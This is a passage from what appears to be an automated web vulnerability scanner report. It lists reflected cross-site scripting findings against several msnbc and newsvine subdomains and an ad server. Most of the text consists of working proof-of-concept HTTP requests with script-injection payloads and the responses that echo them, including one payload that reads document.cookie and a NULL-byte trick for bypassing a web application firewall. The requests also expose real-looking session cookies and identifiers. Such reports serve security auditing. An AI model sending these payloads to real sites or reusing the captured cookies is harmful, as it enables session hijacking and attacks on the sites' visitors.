User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 18:50:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147590

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/science?1a821"><script>alert(1)</script>b786dcb3635=1&nvo=0&21121763|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.248. http://technolog.msnbc.redacted/social-media [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /social-media

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12220"><script>alert(1)</script>e33ff4d9b49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /social-media?12220"><script>alert(1)</script>e33ff4d9b49=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:58:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139987

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/social-media?12220"><script>alert(1)</script>e33ff4d9b49=1&nvo=0&23178899|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.249. http://technolog.msnbc.redacted/twitter [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /twitter

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d574"><script>alert(1)</script>c024c76222e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /twitter?9d574"><script>alert(1)</script>c024c76222e=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:51:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140678

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/twitter?9d574"><script>alert(1)</script>c024c76222e=1&nvo=0&21613902|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.250. http://technolog.msnbc.redacted/verizon-wireless [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /verizon-wireless

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 319d5"><script>alert(1)</script>049683b898c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /verizon-wireless?319d5"><script>alert(1)</script>049683b898c=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 18:55:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119849

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/verizon-wireless?319d5"><script>alert(1)</script>049683b898c=1&nvo=0&25423350|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.251. http://technolog.msnbc.redacted/viral [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /viral

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c125e"><script>alert(1)</script>c8d83ce76c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /viral?c125e"><script>alert(1)</script>c8d83ce76c4=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:57:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154054

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/viral?c125e"><script>alert(1)</script>c8d83ce76c4=1&nvo=0&22601011|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.252. http://technolog.msnbc.redacted/windows-phone-7 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /windows-phone-7

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9291"><script>alert(1)</script>7cb6a5b6f1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /windows-phone-7?b9291"><script>alert(1)</script>7cb6a5b6f1c=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 03:03:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 163051

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/windows-phone-7?b9291"><script>alert(1)</script>7cb6a5b6f1c=1&nvo=0&23093174|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.253. http://technolog2.newsvine.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog2.newsvine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cfc1"-alert(1)-"8900880333e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?8cfc1"-alert(1)-"8900880333e=1 HTTP/1.1
Host: technolog2.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:54:40 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3d19d956049533bc77cf73673a3c5868; expires=Sat, 25-Jan-2031 02:54:40 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 83474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
"";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","4509835","http://technolog2.newsvine.com/?8cfc1"-alert(1)-"8900880333e=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.254. http://thelastword.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thelastword.msnbc.redacted
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1406b"><script>alert(1)</script>2b8d8f3d529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1406b"><script>alert(1)</script>2b8d8f3d529=1 HTTP/1.1
Host: thelastword.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:55:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67411

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>The Last Word</title>
<me
...[SNIP]...
<a class="vine-customContent-moreLink" href="/?1406b"><script>alert(1)</script>2b8d8f3d529=1&nvo=0&24773034|a|n|30|1|t|a|0=10">
...[SNIP]...

5.255. http://thelastword.msnbc.redacted/_vine/printer [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thelastword.msnbc.redacted
Path:   /_vine/printer

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 73d76<img%20src%3da%20onerror%3dalert(1)>9f3c8012458 was submitted in the path parameter. This input was echoed as 73d76<img src=a onerror=alert(1)>9f3c8012458 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=thelastword&path=/73d76<img%20src%3da%20onerror%3dalert(1)>9f3c8012458 HTTP/1.1
Host: thelastword.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; SSLB=0; jt_time=1296391736965

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 15:04:31 GMT
Connection: close
Content-Length: 505

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...
:{"lgstate":-1,"domainName":null,"displayName":null},"devMachine":false,"section":{"type":"g","contentSetId":"24773034","domainName":"thelastword","displayName":"The Last Word","avatar":null,"path":"\/73d76<img src=a onerror=alert(1)>9f3c8012458"},"revision":"23247"}

5.256. http://toddkenreck.newsvine.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://toddkenreck.newsvine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20a9c"-alert(1)-"6afa59ca3a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?20a9c"-alert(1)-"6afa59ca3a6=1 HTTP/1.1
Host: toddkenreck.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:58:30 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b7ceac04b38fe3c57cfc6121518e2eed; expires=Sat, 25-Jan-2031 02:58:30 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 66391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","3897081","http://toddkenreck.newsvine.com/?20a9c"-alert(1)-"6afa59ca3a6=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.257. http://redcated/APM/iview/139941180/direct [;wi.728;hi.90/01?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/139941180/direct

Issue detail

The value of the ;wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c2db</script><script>alert(1)</script>d7be7cfafdb was submitted in the ;wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /APM/iview/139941180/direct;;wi.728;hi.90/01?click=4c2db</script><script>alert(1)</script>d7be7cfafdb HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1891
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:05 GMT

<SCRIPT Language="Javascript">
var DCcode="N4319.MSNMEN/B3889285.6;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=4c2db</script><script>alert(1)</script>d7be7cfafdbhttp://clk.redcated/goiframe/198094427.198102269/139941180/direct/01%3fhref=";
var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + randNu
...[SNIP]...

5.258. http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/139941180/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf01"-alert(1)-"5cff1b03f70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /APM/iview/139941180/direct;;wi.728;hi.90/01?click=&faf01"-alert(1)-"5cff1b03f70=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1814
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:49 GMT

<SCRIPT Language="Javascript">
var DCcode="N4319.msn/B2087123.383;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=&faf01"-alert(1)-"5cff1b03f70=1http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=";
var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + rand
...[SNIP]...

5.259. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The value of the ;wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db6a3</script><script>alert(1)</script>5e444db1be0 was submitted in the ;wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=db6a3</script><script>alert(1)</script>5e444db1be0 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6864
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:07 GMT

<html><head><title>FLORIST_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" bgcol
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCP91283965132066();
var _CP91283965132066_Instance =
{
click : "db6a3</script><script>alert(1)</script>5e444db1be0",
clickThruUrl: "http://clk.redcated/go/148848786/direct;wi.728;hi.90;ai.197439863.197970693.196187415;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize
...[SNIP]...

5.260. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The value of the ;wi.728;hi.90/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f440c</script>34fd740c671 was submitted in the ;wi.728;hi.90/01?click parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=f440c</script>34fd740c671 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6739
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:41 GMT

<html><head><title>FLORIST_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;" bgcol
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCP91283965132066();
var _CP91283965132066_Instance =
{
click : "f440c</script>34fd740c671",
clickThruUrl: "http://clk.redcated/go/148848786/direct;wi.728;hi.90;ai.197439863.197970693.196187415;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize
...[SNIP]...

5.261. http://redcated/APM/iview/148848786/direct [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

